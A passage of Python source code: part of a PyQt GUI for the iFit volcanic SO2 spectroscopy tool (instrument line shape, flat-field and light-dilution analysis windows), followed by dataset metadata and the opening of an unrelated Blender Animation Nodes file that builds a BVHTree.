ax.setDownsampling(mode='peak')
ax.setClipToView(True)
ax.showGrid(x=True, y=True)
# Add axis labels
self.ax0.setLabel('left', 'Intensity (counts)')
self.ax1.setLabel('left', 'Intensity (arb)')
self.ax1.setLabel('bottom', 'Wavelength (nm)')
# Add the graphs to the layout
glayout.addWidget(graphwin, 0, 0, 1, 7)
layout.addWidget(w, 0, 5, 5, 1)
def import_spectra(self):
"""Read in ILS spectra and display."""
# Read in the dark spectra
files = self.dark_fnames.toPlainText()
if files == '':
dark = 0
else:
x, dark = average_spectra(files.split('\n'),
self.spec_type.currentText())
# for i, fname in enumerate(files.split('\n')):
# x, y = np.loadtxt(fname, unpack=True)
# if i == 0:
# spec = y
# else:
# spec += y
#
# dark = np.divide(spec, i+1)
# Read in the measurement spectra
for i, fname in enumerate(self.spec_fnames.toPlainText().split('\n')):
x, y = np.loadtxt(fname, unpack=True)
if i == 0:
spec = y
else:
spec += y
self.x = x
self.spec = np.divide(spec, i+1) - dark
# Add to the graph
self.ax0.clear()
self.l0 = self.ax0.plot(self.x, self.spec,
pen=pg.mkPen(color='#1f77b4', width=1.0))
# Add the region selector
self.lr = pg.LinearRegionItem([x[0], x[-1]])
self.lr.setZValue(-10)
self.ax0.addItem(self.lr)
def measure_ils(self):
"""Measure the ILS on the selected line."""
# Get the highlighted region
i0, i1 = self.lr.getRegion()
idx = np.where(np.logical_and(self.x >= i0, self.x <= i1))
grid = self.x[idx]
line = self.spec[idx]
# Find the line
center = grid[line.argmax()]
# Center grid on zero
grid = grid - center
# Remove the offset and normalise
line = line - min(line)
line = np.divide(line, max(line))
# Fit super gaussian
p0 = [0.34, 2, 0.0, 0.0, 0.0, 1.0, 0.0]
self.popt, pcov = curve_fit(super_gaussian, grid, line, p0=p0)
ngrid = np.arange(grid[0], grid[-1]+0.01, 0.01)
fit = super_gaussian(ngrid, *self.popt)
# Plot
self.ax1.clear()
self.ax1.plot(grid, line, pen=None, symbol='+', symbolPen=None,
symbolSize=10, symbolBrush='#1f77b4')
self.ax1.plot(ngrid, fit, pen=pg.mkPen(color='#ff7f0e', width=1.0))
def save_fit(self):
"""Save the ILS fit parameters."""
w, k, a_w, a_k, shift, amp, offset = self.popt
fwem = 2*w
np.savetxt(self.save_path.text(), [fwem, k, a_w, a_k],
header='ILS parameters (FWEM, k, a_w, a_k)')
# =============================================================================
# Measure Flat Spectrum
# =============================================================================
class FLATWindow(QMainWindow):
"""Open a window for flat-field analysis."""
def __init__(self, parent=None):
"""Initialise the window."""
super(FLATWindow, self).__init__(parent)
# Set the window properties
self.setWindowTitle('Measure Flat Field')
self.statusBar().showMessage('Ready')
self.setGeometry(40, 40, 1000, 500)
self.setWindowIcon(QIcon('bin/icons/flat.png'))
# Set the window layout
self.generalLayout = QGridLayout()
self._centralWidget = QScrollArea()
self.widget = QWidget()
self.setCentralWidget(self._centralWidget)
self.widget.setLayout(self.generalLayout)
# Scroll Area Properties
self._centralWidget.setWidgetResizable(True)
self._centralWidget.setWidget(self.widget)
self._createApp()
def _createApp(self):
layout = QGridLayout(self._centralWidget)
# Add an input for the spectra selection
layout.addWidget(QLabel('Spectra:'), 0, 0)
self.spec_fnames = QTextEdit()
self.spec_fnames.setFixedSize(300, 150)
layout.addWidget(self.spec_fnames, 0, 1, 1, 3)
btn = QPushButton('Browse')
btn.setFixedSize(70, 25)
btn.clicked.connect(partial(browse, self, self.spec_fnames, 'multi'))
layout.addWidget(btn, 0, 4)
# Add an input for the dark spectra selection
layout.addWidget(QLabel('Dark\nSpectra:'), 1, 0)
self.dark_fnames = QTextEdit()
self.dark_fnames.setFixedSize(300, 150)
layout.addWidget(self.dark_fnames, 1, 1, 1, 3)
btn = QPushButton('Browse')
btn.setFixedSize(70, 25)
btn.clicked.connect(partial(browse, self, self.dark_fnames, 'multi'))
layout.addWidget(btn, 1, 4)
# Add an input for the save selection
layout.addWidget(QLabel('Save:'), 2, 0)
self.save_path = QLineEdit()
layout.addWidget(self.save_path, 2, 1, 1, 3)
btn = QPushButton('Browse')
btn.setFixedSize(70, 25)
btn.clicked.connect(partial(browse, self, self.save_path,
'save'))
layout.addWidget(btn, 2, 4)
btn = QPushButton('Import')
btn.setFixedSize(70, 25)
btn.clicked.connect(self.import_spectra)
layout.addWidget(btn, 3, 1)
btn = QPushButton('Fit')
btn.setFixedSize(70, 25)
btn.clicked.connect(self.measure_flat)
layout.addWidget(btn, 3, 2)
btn = QPushButton('Save')
btn.setFixedSize(70, 25)
btn.clicked.connect(self.save_fit)
layout.addWidget(btn, 3, 3)
graphwin = pg.GraphicsLayoutWidget(show=True)
pg.setConfigOptions(antialias=True)
# pg.setConfigOptions(useOpenGL=True)
w = QWidget()
glayout = QGridLayout(w)
# Make the graphs
self.ax0 = graphwin.addPlot(row=0, col=0)
self.ax1 = graphwin.addPlot(row=1, col=0)
self.ax2 = graphwin.addPlot(row=2, col=0)
self.plot_axes = [self.ax0, self.ax1, self.ax2]
for ax in self.plot_axes:
ax.setDownsampling(mode='peak')
ax.setClipToView(True)
ax.showGrid(x=True, y=True)
# Add axis labels
self.ax0.setLabel('left', 'Intensity (counts)')
self.ax1.setLabel('left', 'Intensity (counts)')
self.ax2.setLabel('left', 'Flat Response')
self.ax2.setLabel('bottom', 'Wavelength (nm)')
# Add the graphs to the layout
glayout.addWidget(graphwin, 0, 0, 1, 7)
layout.addWidget(w, 0, 5, 5, 1)
def import_spectra(self):
"""Read in ILS spectra and display."""
# Read in the dark spectra
files = self.dark_fnames.toPlainText()
if files == '':
dark = 0
else:
for i, fname in enumerate(files.split('\n')):
x, y = np.loadtxt(fname, unpack=True)
if i == 0:
spec = y
else:
spec += y
dark = np.divide(spec, i+1)
# Read in the measurement spectra
for i, fname in enumerate(self.spec_fnames.toPlainText().split('\n')):
x, y = np.loadtxt(fname, unpack=True)
if i == 0:
spec = y
else:
spec += y
self.x = x
self.y = np.divide(spec, i+1) - dark
# Add to the graph
self.ax0.clear()
self.ax1.clear()
self.ax2.clear()
self.l0 = self.ax0.plot(self.x, self.y,
pen=pg.mkPen(color='#1f77b4', width=1.0))
# Add the region selector
self.lr = pg.LinearRegionItem([x[0], x[-1]])
self.lr.setZValue(-10)
self.ax0.addItem(self.lr)
def measure_flat(self):
"""Measure the flat spectrum across the selected region."""
width = 5
# Get the highlighted region
i0, i1 = self.lr.getRegion()
idx = np.where(np.logical_and(self.x >= i0, self.x <= i1))
self.grid = self.x[idx]
self.spec = self.y[idx]
# Create the boxcar window
window = np.ones(width) / width
# Pad the array with values to avoid edge effects
pre_array = np.ones(width-1) * self.spec[0]
post_array = np.ones(width-1) * self.spec[-1]
# Add padding to the origional array
spec = np.append(pre_array, self.spec)
spec = np.append(spec, post_array)
# Convolve with boxcar to smooth
smooth_spec = np.convolve(spec, window, 'same')
# Cut array to origional size
smooth_spec = smooth_spec[width-1:-(width-1)]
self.ax1.plot(self.grid, self.spec, pen=pg.mkPen(color='#1f77b4'))
self.ax1.plot(self.grid, smooth_spec, pen=pg.mkPen(color='#ff7f0e'))
self.flat = np.divide(self.spec, smooth_spec)
self.ax2.plot(self.grid, self.flat, pen=pg.mkPen(color='#1f77b4'))
def save_fit(self):
"""Save the flat response."""
data = np.column_stack([self.grid, self.flat])
header = 'Flat spectrum\nWavelength (nm), Flat Response'
np.savetxt(self.save_path.text(), data, header=header)
# =============================================================================
# Measure Light Dilution
# =============================================================================
class LDFWindow(QMainWindow):
"""Open a window for light dilution analysis."""
def __init__(self, widgetData, parent=None):
"""Initialise the window."""
super(LDFWindow, self).__init__(parent)
# Set the window properties
self.setWindowTitle('Light Dilution Analysis')
self.statusBar().showMessage('Ready')
self.setGeometry(40, 40, 1200, 700)
self.setWindowIcon(QIcon('bin/icons/ldf.png'))
# Generate the threadpool for launching background processes
self.threadpool = QThreadPool()
# Set the window layout
self.generalLayout = QGridLayout()
self._centralWidget = QScrollArea()
self.widget = QWidget()
self.setCentralWidget(self._centralWidget)
self.widget.setLayout(self.generalLayout)
# Scroll Area Properties
self._centralWidget.setWidgetResizable(True)
self._centralWidget.setWidget(self.widget)
# Save the main GUI widget data
self.widgetData = widgetData
self._createApp()
def _createApp(self):
"""Create the main app widgets."""
# Create a frame to hold program controls
self.controlFrame = QFrame(self)
self.controlFrame.setFrameShape(QFrame.StyledPanel)
# Create a frame to hold program outputs
self.outputFrame = QFrame(self)
self.outputFrame.setFrameShape(QFrame.StyledPanel)
# Create a frame to hold graphs
self.graphFrame = QFrame(self)
self.graphFrame.setFrameShape(QFrame.StyledPanel)
# Add splitters to allow for adjustment
splitter1 = QSplitter(Qt.Vertical)
splitter1.addWidget(self.controlFrame)
splitter1.addWidget(self.outputFrame)
splitter2 = QSplitter(Qt.Horizontal)
splitter2.addWidget(splitter1)
splitter2.addWidget(self.graphFrame)
# Pack the Frames and splitters
self.generalLayout.addWidget(splitter2)
# Create the individual widgets
self._createControls()
self._createOutput()
self._createGraphs()
# =============================================================================
# Program controls
# =============================================================================
def _createControls(self):
"""Create main analysis controls."""
# Setup tab layout
tablayout = QGridLayout(self.controlFrame)
# Generate tabs for the gaphs and settings
tab1 = QWidget()
tab2 = QWidget()
# Form the tab widget
tabwidget = QTabWidget()
tabwidget.addTab(tab1, 'Generate Curves')
tabwidget.addTab(tab2, 'Load Data')
tablayout.addWidget(tabwidget, 0, 0)
# Generate Curves =====================================================
# Setup the main layout
layout = QGridLayout(tab1)
layout.setAlignment(Qt.AlignTop)
# Create an option menu for the spectra format
layout.addWidget(QLabel('Format:'), 0, 0)
self.spec_type = QComboBox()
self.spec_type.addItems(['iFit',
'Master.Scope',
'Spectrasuite',
'mobileDOAS',
'Basic'])
self.spec_type.setFixedSize(100, 20)
layout.addWidget(self.spec_type, 0, 1)
index = self.spec_type.findText(self.widgetData['spec_type'],
Qt.MatchFixedString)
if index >= 0:
self.spec_type.setCurrentIndex(index)
# Add an input for the spectra selection
layout.addWidget(QLabel('Spectra:'), 1, 0)
self.spec_fnames = QTextEdit()
self.spec_fnames.setFixedHeight(75)
layout.addWidget(self.spec_fnames, 1, 1, 1, 3)
btn = QPushButton('Browse')
btn.setFixedSize(70, 25)
btn.clicked.connect(partial(browse, self, self.spec_fnames, 'multi'))
layout.addWidget(btn, 1, 4)
# Add an input for the dark selection
layout.addWidget(QLabel('Dark Spectra:'), 2, 0)
self.dark_fnames = QTextEdit()
self.dark_fnames.setFixedHeight(75)
layout.addWidget(self.dark_fnames, 2, 1, 1, 3)
btn = QPushButton('Browse')
btn.setFixedSize(70, 25)
btn.clicked.connect(partial(browse, self, self.dark_fnames, 'multi'))
layout.addWidget(btn, 2, 4)
# Add spinboxs for the fit windows
layout.addWidget(QLabel('Fit Window 1:\n (nm)'), 3, 0, 2, 1)
self.wb1_lo = DSpinBox(306, [0, 10000], 0.1)
self.wb1_lo.setFixedSize(70, 20)
layout.addWidget(self.wb1_lo, 3, 1)
self.wb1_hi = DSpinBox(316, [0, 10000], 0.1)
self.wb1_hi.setFixedSize(70, 20)
layout.addWidget(self.wb1_hi, 4, 1)
layout.addWidget(QLabel('Fit Window 2:\n (nm)'), 3, 2, 2, 1)
self.wb2_lo = DSpinBox(312, [0, 10000], 0.1)
self.wb2_lo.setFixedSize(70, 20)
layout.addWidget(self.wb2_lo, 3, 3)
self.wb2_hi = DSpinBox(322, [0, 10000], 0.1)
self.wb2_hi.setFixedSize(70, 20)
layout.addWidget(self.wb2_hi, 4, 3)
# Add entries for the SO2 grid
layout.addWidget(QLabel('SO<sub>2</sub> Grid Low:'), 5, 0)
self.so2_grid_lo = QLineEdit()
self.so2_grid_lo.setText('0.0')
self.so2_grid_lo.setFixedSize(100, 20)
layout.addWidget(self.so2_grid_lo, 5, 1)
layout.addWidget(QLabel('SO<sub>2</sub> Grid High:'), 6, 0)
self.so2_grid_hi = QLineEdit()
self.so2_grid_hi.setText('1.0e19')
self.so2_grid_hi.setFixedSize(100, 20)
layout.addWidget(self.so2_grid_hi, 6, 1)
layout.addWidget(QLabel('SO<sub>2</sub> Grid Step:'), 7, 0)
self.so2_grid_step = QLineEdit()
self.so2_grid_step.setText('5.0e17')
self.so2_grid_step.setFixedSize(100, 20)
layout.addWidget(self.so2_grid_step, 7, 1)
# Add entries for the LDF grid
layout.addWidget(QLabel('LDF Grid Low:'), 5, 2)
self.ldf_grid_lo = QLineEdit()
self.ldf_grid_lo.setText('0.0')
self.ldf_grid_lo.setFixedSize(100, 20)
layout.addWidget(self.ldf_grid_lo, 5, 3)
layout.addWidget(QLabel('LDF Grid High:'), 6, 2)
self.ldf_grid_hi = QLineEdit()
self.ldf_grid_hi.setText('0.9')
self.ldf_grid_hi.setFixedSize(100, 20)
layout.addWidget(self.ldf_grid_hi, 6, 3)
layout.addWidget(QLabel('LDF Grid Step:'), 7, 2)
self.ldf_grid_step = QLineEdit()
self.ldf_grid_step.setText('0.1')
self.ldf_grid_step.setFixedSize(100, 20)
layout.addWidget(self.ldf_grid_step, 7, 3)
# Add an input for the save selection
layout.addWidget(QLabel('Output File:'), 8, 0)
self.save_path = QLineEdit()
self.save_path.setFixedHeight(25)
layout.addWidget(self.save_path, 8, 1, 1, 3)
btn = QPushButton('Browse')
btn.setFixedSize(70, 25)
btn.clicked.connect(partial(browse, self, self.save_path,
'save', "Text (*.txt)"))
layout.addWidget(btn, 8, 4)
# Add button to begin analysis
self.start_btn = QPushButton('Begin!')
self.start_btn.clicked.connect(partial(self.calc_ld_curves))
self.start_btn.setFixedSize(90, 25)
layout.addWidget(self.start_btn, 9, 1)
# Add button to pause analysis
self.save_btn = QPushButton('Save')
self.save_btn.clicked.connect(partial(self.save_ld_curves))
self.save_btn.setFixedSize(90, 25)
self.save_btn.setEnabled(False)
layout.addWidget(self.save_btn, 9, 2)
# Load Curves =========================================================
# Setup the main layout
layout = QGridLayout(tab2)
layout.setAlignment(Qt.AlignTop)
# Add an input for the loading selection
layout.addWidget(QLabel('Light Dilution\nCurve File:'), 0, 0)
self.load_path = QLineEdit()
self.load_path.setFixedHeight(25)
layout.addWidget(self.load_path, 0, 1, 1, 3)
btn = QPushButton('Browse')
btn.setFixedSize(70, 25)
btn.clicked.connect(partial(browse, self, self.load_path,
'single', "Text (*.txt)"))
layout.addWidget(btn, 0, 4)
btn = QPushButton('Load')
btn.setFixedSize(70, 25)
btn.clicked.connect(self.load_ld_curves)
layout.addWidget(btn, 0, 5)
layout.addWidget(QHLine(), 1, 0, 1, 5)
# Add an input for the iFit output files
layout.addWidget(QLabel('iFit Output:\n(W1):'), 2, 0)
self.ifit_1_path = QLineEdit()
self.ifit_1_path.setFixedHeight(25)
layout.addWidget(self.ifit_1_path, 2, 1, 1, 3)
btn = QPushButton('Browse')
btn.setFixedSize(70, 25)
btn.clicked.connect(partial(browse, self, self.ifit_1_path,
'single', "Comma separated (*.csv)"))
layout.addWidget(btn, 2, 4)
layout.addWidget(QLabel('iFit Output:\n(W2):'), 3, 0)
self.ifit_2_path = QLineEdit()
self.ifit_2_path.setFixedHeight(25)
layout.addWidget(self.ifit_2_path, 3, 1, 1, 3)
btn = QPushButton('Browse')
btn.setFixedSize(70, 25)
btn.clicked.connect(partial(browse, self, self.ifit_2_path,
'single', "Comma separated (*.csv)"))
layout.addWidget(btn, 3, 4)
btn = QPushButton('Load')
btn.setFixedSize(70, 25)
btn.clicked.connect(self.load_ifit_data)
layout.addWidget(btn, 2, 5, 2, 1)
# =============================================================================
# Program outputs
# =============================================================================
def _createOutput(self):
"""Create program output widgets."""
# Generate the layout
layout = QGridLayout(self.outputFrame)
# Create a textbox to display the program messages
self.logBox = QTextEditLogger(self)
self.logBox.setFormatter(logging.Formatter('%(message)s'))
logging.getLogger().addHandler(self.logBox)
logging.getLogger().setLevel(logging.INFO)
layout.addWidget(self.logBox.widget, 0, 0)
# =============================================================================
# Graphs
# =============================================================================
def _createGraphs(self):
"""Generate the graphs."""
# Generate the graph layout and window
layout = QGridLayout(self.graphFrame)
pg.setConfigOptions(antialias=True)
graphwin = pg.GraphicsLayoutWidget(show=True)
# Make the graphs
self.ax = graphwin.addPlot()
self.ax.setDownsampling(mode='peak')
self.ax.setClipToView(True)
self.ax.showGrid(x=True, y=True)
# Add axis labels
self.ax.setLabel('left', 'SO<sub>2</sub> W2 (molec cm<sup>-2</sup>)')
self.ax.setLabel('bottom', 'SO<sub>2</sub> W1 (molec cm<sup>-2</sup>)')
# Create an order parameter to scale the graphs
self.order = None
# Add the graphs to the layout
layout.addWidget(graphwin, 0, 0, 0, 0)
# =============================================================================
# Program functions
# =============================================================================
def calc_ld_curves(self):
"""Calculate Light Dilution curve data."""
# Disable buttons
self.start_btn.setEnabled(False)
self.save_btn.setEnabled(False)
# Pull the waveband data from the LD gui and pad for the initial fit
self.widgetData['fit_lo'] = self.wb1_lo.value() - 1
self.widgetData['fit_hi'] = self.wb2_hi.value() + 1
# Grab the spectra type from the GUI
self.widgetData['spec_type'] = self.spec_type.currentText()
# Pull the waveband, SO2 and LDF grid info from the GUI
ld_kwargs = {'wb1': [self.wb1_lo.value(), self.wb1_hi.value()],
'wb2': [self.wb2_lo.value(), self.wb2_hi.value()],
'so2_lims': [float(self.so2_grid_lo.text()),
float(self.so2_grid_hi.text())],
'so2_step': float(self.so2_grid_step.text()),
'ldf_lims': [float(self.ldf_grid_lo.text()),
float(self.ldf_grid_hi.text())],
'ldf_step': float(self.ldf_grid_step.text())}
# Load the spectra to fit
spec_fnames = self.spec_fnames.toPlainText().split('\n')
dark_fnames = self.dark_fnames.toPlainText().split('\n')
# Initialise the analysis worker
self.ldThread = QThread()
self.ldWorker = LDWorker(spec_fnames, dark_fnames, self.widgetData,
ld_kwargs)
self.ldWorker.moveToThread(self.ldThread)
self.ldThread.started.connect(self.ldWorker.run)
self.ldWorker.finished.connect(self.analysis_complete)
self.ldWorker.data.connect(self.handle_data)
self.ldWorker.finished.connect(self.ldThread.quit)
self.ldWorker.finished.connect(self.ldWorker.deleteLater)
self.ldThread.finished.connect(self.ldThread.deleteLater)
self.ldThread.start()
def handle_data(self, ld_results):
"""Handle the LD results."""
self.ld_results = ld_results
self.plot_ld_curves(ld_results)
def analysis_complete(self):
"""Run when LD analysis is complete."""
self.start_btn.setEnabled(True)
self.save_btn.setEnabled(True)
def save_ld_curves(self):
"""Save Light Dilution curve data."""
if self.save_path.text() == '':
filter = "Text (*.txt)"
fname, _ = QFileDialog.getSaveFileName(self, 'Save As', '', filter)
else:
fname = self.save_path.text()
header = 'LDF Curves generated by iFit. All SCDs in [molec/cm^2]\n' \
+ f'W1: {self.wb1_lo.value()} - {self.wb1_hi.value()} nm\n' \
+ f'W2: {self.wb2_lo.value()} - {self.wb2_hi.value()} nm\n' \
+ 'LDF\tModel_SO2_SCD\tW1_SO2_SCD\tW1_SO2_Err\t' \
+ 'W2_SO2_SCD\tW2_SO2_Err'
np.savetxt(fname, self.ld_results, header=header)
logger.info('Light dilution curve data saved!')
def load_ld_curves(self):
"""Load the light dilution curve data."""
if self.load_path.text() == '':
filter = "Text (*.txt)"
fname, _ = QFileDialog.getOpenFileName(self, 'Load', '', filter)
else:
fname = self.load_path.text()
self.ld_results = np.loadtxt(fname)
self.plot_ld_curves(self.ld_results)
logger.info('Light dilution curve data loaded!')
def load_ifit_data(self):
"""Load the light dilution curve data."""
# Read in the iFit analysis results
df1 = pd.read_csv(self.ifit_1_path.text(), comment='#')
df2 = pd.read_csv(self.ifit_2_path.text(), comment='#')
if self.order is None:
max_val = np.max([np.nanmax(df1['SO2']), np.nanmax(df2['SO2'])])
if ~np.isnan(max_val) and max_val > 1e6:
self.order = int(np.ceil(np.log10(max_val))) - 1
self.ax.setLabel(
'left',
'SO<sub>2</sub> W2 (molec cm<sup>-2</sup>) '
+ f'(1e{self.order})'
)
self.ax.setLabel(
'bottom',
'SO<sub>2</sub> W1 (molec cm<sup>-2</sup>) '
+ f'(1e{self.order})'
)
else:
self.order = 0
self.ax.setLabel(
'left', 'SO<sub>2</sub> W2 (molec cm<sup>-2</sup>)')
self.ax.setLabel(
'bottom', 'SO<sub>2</sub> W1 (molec cm<sup>-2</sup>)')
plotx = df1['SO2'] / 10**self.order
ploty = df2['SO2'] / 10**self.order
# Plot on the graph
p0 = pg.mkPen(color='#1f77b4', width=0.5)
line = self.ax.plot(plotx, ploty, pen=None, symbolPen=p0,
symbol='o', brush=None)
line.setAlpha(0.75, False)
logger.info('iFit data loaded!')
def plot_ld_curves(self, ld_results):
"""Plot the light dilution curves."""
# Clear the plot
self.ax.clear()
self.order = None
# Pull out the unique LDF values
ldf_grid = np.unique(ld_results[:, 0])
# Check for large number in the time series. This is due to
# a bug in pyqtgraph not displaying large numbers
if self.order is None:
max_val = np.max([np.nanmax(np.abs(ld_results[:, 2])),
np.nanmax(np.abs(ld_results[:, 4]))])
# Calculate the required order and update the axes labels
if ~np.isnan(max_val) and max_val > 1e6:
self.order = int(np.ceil(np.log10(max_val))) - 1
self.ax.setLabel(
'left',
'SO<sub>2</sub> W2 (molec cm<sup>-2</sup>) '
+ f'(1e{self.order})'
)
self.ax.setLabel(
'bottom',
'SO<sub>2</sub> W1 (molec cm<sup>-2</sup>) '
+ f'(1e{self.order})'
)
else:
self.order = 0
self.ax.setLabel(
'left', 'SO<sub>2</sub> W2 (molec cm<sup>-2</sup>)')
self.ax.setLabel(
'bottom', 'SO<sub>2</sub> W1 (molec cm<sup>-2</sup>)')
# Get the curve data for each LDF value
legend = self.ax.addLegend()
for i, ldf in enumerate(ldf_grid):
row_idx = np.where(ld_results[:, 0] == ldf)[0]
so2_scd_1 = ld_results[row_idx, 2]
# so2_err_1 = ld_results[row_idx, 3]
so2_scd_2 = ld_results[row_idx, 4]
# so2_err_2 = ld_results[row_idx, 5]
# Adjust for large numbers if neccissary
if self.order is not None:
so2_scd_1 = so2_scd_1 / 10**self.order
so2_scd_2 = so2_scd_2 / 10**self.order
# Plot!
line = self.ax.plot(so2_scd_1, so2_scd_2,
pen=pg.mkPen(color=COLORS[i % 10], width=2.0))
legend.addItem(line, name=f'LDF={ldf:.02f}')
# =============================================================================
# Useful functions
# =============================================================================
def browse(gui, widget, mode='single', filter=False):
"""Open file dialouge."""
if not filter:
filter = None
else:
filter = filter + ';;All Files (*)'
if mode == 'single':
fname, _ = QFileDialog.getOpenFileName(gui, 'Select File', '',
filter)
if fname != '':
widget.setText(fname)
elif mode == 'multi':
fnames, _ = QFileDialog.getOpenFileNames(gui, 'Select Files', '',
filter)
if fnames != []:
widget.setText('\n'.join(fnames))
elif mode == 'save':
fname, _ = QFileDialog.getSaveFileName(gui, 'Save As', '', filter)
if fname != '':
widget.setText(fname)
elif mode == 'folder':
fname = QFileDialog.getExistingDirectory(gui, 'Select Foler')
if fname != '':
widget.setText(fname + '/')
# Create a worker to handle QThreads for light dilution analysis
class LDWorker(QObject):
"""Worker thread.
Inherits from QRunnable to handler worker thread setup, signals and wrap-up
Parameters
----------
fn : function
The function to run on the worker thread
mode : str
Flags which signals to use. Must be one of 'analyse' or 'acquire', for
a spectral analysis or acquisition thread respectively
Attributes
----------
args : list
Arguments to pass to the function
kwargs : dict
Keyword arguments to pass to the function
signals : WorkerSignals object
The worker signals
is_paused : bool
State to show if the worker has been paused
is_killed : bool
State to show if the worker has been killed
spec_fname : str
File path to the last measured spectrum
"""
# Define signals
finished = pyqtSignal()
data = pyqtSignal(np.ndarray)
error = pyqtSignal(tuple)
def __init__(self, spec_fnames, dark_fnames, widgetData, ld_kwargs):
"""Initialise."""
super(QObject, self).__init__()
# Create stopped and paused flags
self.is_paused = False
self.is_killed = False
# Create a holder for the spectrum filepath
self.spec_fnames = spec_fnames
self.dark_fnames = dark_fnames
self.widgetData = widgetData
self.ld_kwargs = ld_kwargs
def run(self):
"""Launch worker function."""
try:
self._run()
except Exception:
traceback.print_exc()
exctype, value = sys.exc_info()[:2]
self.error.emit((exctype, value, traceback.format_exc()))
self.finished.emit()
def _run(self):
"""Launch LD analysis from the GUI."""
# Read in the spectra
spectrum = average_spectra(self.spec_fnames,
self.widgetData['spec_type'],
self.widgetData['wl_calib'])
if self.widgetData['dark_flag']:
x, dark = average_spectra(self.dark_fnames,
self.widgetData['spec_type'],
self.widgetData['wl_calib'])
else:
dark = 0
# Generate the analyser
logger.info('Generating the iFit analyser...')
self.analyser = self.generate_analyser()
self.analyser.dark_spec = dark
# Generate the light dilution curves
logger.info('Beginning light dilution calculations')
ld_results = generate_ld_curves(self.analyser, spectrum,
**self.ld_kwargs)
self.data.emit(ld_results)
def generate_analyser(self):
"""Generate iFit analyser."""
# Initialise the Parameters
logger.info('Generating model analyser')
self.params = Parameters()
# Pull the parameters from the parameter table
for line in self.widgetData['gas_params']:
self.params.add(name=line[0], value=line[1], vary=line[2],
xpath=line[4], plume_gas=line[3])
for i, line in enumerate(self.widgetData['bgpoly_params']):
self.params.add(name=f'bg_poly{i}', value=line[0], vary=line[1])
for i, line in enumerate(self.widgetData['offset_params']):
self.params.add(name=f'offset{i}', value=line[0], vary=line[1])
for i, line in enumerate(self.widgetData['shift_params']):
self.params.add(name=f'shift{i}', value=line[0], vary=line[1])
# Check if ILS is in the fit
if self.widgetData['ils_mode'] == 'Manual':
self.params.add('fwem', value=float(self.widgetData['fwem']),
vary=self.widgetData['fwem_fit'])
self.params.add('k', value=float(self.widgetData['k']),
vary=self.widgetData['k_fit'])
self.params.add('a_w', value=float(self.widgetData['a_w']),
vary=self.widgetData['a_w_fit'])
self.params.add('a_k', value=float(self.widgetData['a_k']),
vary=self.widgetData['a_k_fit'])
# Add the light dilution factor
if self.widgetData['ldf_fit'] or self.widgetData['ldf'] != 0.0:
self.params.add('LDF', value=float(self.widgetData['ldf']),
vary=self.widgetData['ldf_fit'])
# Report fitting parameters
logger.info(self.params.pretty_print(cols=['name', 'value', 'vary',
'xpath']))
# Get the bad pixels
if self.widgetData['bad_pixels'] != '':
bad_pixels = [int(i) for i
in self.widgetData['bad_pixels'].split(',')]
else:
bad_pixels = []
# Generate the analyser
analyser = Analyser(params=self.params,
fit_window=[self.widgetData['fit_lo'],
self.widgetData['fit_hi']],
frs_path=self.widgetData['frs_path'],
model_padding=self.widgetData['model_padding'],
model_spacing=self.widgetData['model_spacing'],
flat_flag=self.widgetData['flat_flag'],
flat_path=self.widgetData['flat_path'],
stray_flag=self.widgetData['stray_flag'],
stray_window=[self.widgetData['stray_lo'],
self.widgetData['stray_hi']],
dark_flag=self.widgetData['dark_flag'],
ils_type=self.widgetData['ils_mode'],
ils_path=self.widgetData['ils_path'],
despike_flag=self.widgetData['despike_flag'],
spike_limit=self.widgetData['spike_limit'],
bad_pixels=bad_pixels)
return analyser
def pause(self):
"""Pause the analysis/acquisition."""
if self.is_paused:
self.is_paused = False
else:
self.is_paused = True
def resume(self):
"""Resume the analysis/acquisition."""
self.is_paused = False
def stop(self):
"""Terminate the analysis/acquisition."""
if self.is_paused:
self.is_paused = False
self.is_stopped = True
class QHLine(QFrame):
"""Horizontal line widget."""
def __init__(self):
"""Initialise."""
super(QHLine, self).__init__()
self.setFrameShape(QFrame.HLine)
self.setFrameShadow(QFrame.Sunken)
# Cliet Code
def main():
"""Start the main function."""
# Create an instance of QApplication
app = QApplication(sys.argv)
app.setStyle("Fusion")
# Use a palette to switch to dark colors:
palette = QPalette()
palette.setColor(QPalette.Window, QColor(53, 53, 53))
palette.setColor(QPalette.WindowText, Qt.white)
palette.setColor(QPalette.Base, QColor(25, 25, 25))
palette.setColor(QPalette.AlternateBase, QColor(53, 53, 53))
palette.setColor(QPalette.ToolTipBase, Qt.black)
palette.setColor(QPalette.ToolTipText, Qt.white)
palette.setColor(QPalette.Text, Qt.white)
palette.setColor(QPalette.Button, QColor(53, 53, 53))
palette.setColor(QPalette.Active, QPalette.Button, QColor(53, 53, 53))
palette.setColor(QPalette.ButtonText, Qt.white)
palette.setColor(QPalette.BrightText, Qt.red)
palette.setColor(QPalette.Link, QColor(42, 130, 218))
palette.setColor(QPalette.Highlight, QColor(42, 130, 218))
palette.setColor(QPalette.HighlightedText, Qt.black)
palette.setColor(QPalette.Disabled, QPalette.ButtonText, Qt.darkGray)
app.setPalette(palette)
# Show the GUI
view = CalcFlux()
view.show()
# Execute the main loop
sys.exit(app.exec_())
if __name__ == '__main__':
main()
main()
main()
main()
| 38.054703
| 79
| 0.552025
|
acff5f713632fce33c21a68b8f3673f2584ef380
| 2,466
|
py
|
Python
|
scripts/addons/animation_nodes/nodes/bvh_tree/construct.py
|
Tilapiatsu/blender-custom_conf
|
05592fedf74e4b7075a6228b8448a5cda10f7753
|
[
"MIT"
] | 2
|
2020-04-16T22:12:40.000Z
|
2022-01-22T17:18:45.000Z
|
scripts/addons/animation_nodes/nodes/bvh_tree/construct.py
|
Tilapiatsu/blender-custom_conf
|
05592fedf74e4b7075a6228b8448a5cda10f7753
|
[
"MIT"
] | null | null | null |
scripts/addons/animation_nodes/nodes/bvh_tree/construct.py
|
Tilapiatsu/blender-custom_conf
|
05592fedf74e4b7075a6228b8448a5cda10f7753
|
[
"MIT"
] | 2
|
2019-05-16T04:01:09.000Z
|
2020-08-25T11:42:26.000Z
|
import bpy
from bpy.props import *
from mathutils.bvhtree import BVHTree
from ... base_types import AnimationNode
sourceTypeItems = [
("MESH_DATA", "Mesh", "", "NONE", 0),
("BMESH", "BMesh", "", "NONE", 1),
("OBJECT", "Object", "", "NONE", 2) ]
class ConstructBVHTreeNode(bpy.types.Node, AnimationNode):
bl_idname = "an_ConstructBVHTreeNode"
bl_label = "Construct BVHTree"
bl_width_default = 160
sourceType: EnumProperty(name = "Source Type", default = "MESH_DATA",
items = sourceTypeItems, update = AnimationNode.refresh)
def create(self):
if self.sourceType == "MESH_DATA":
self.newInput("Vector List", "Vector List", "vectorList")
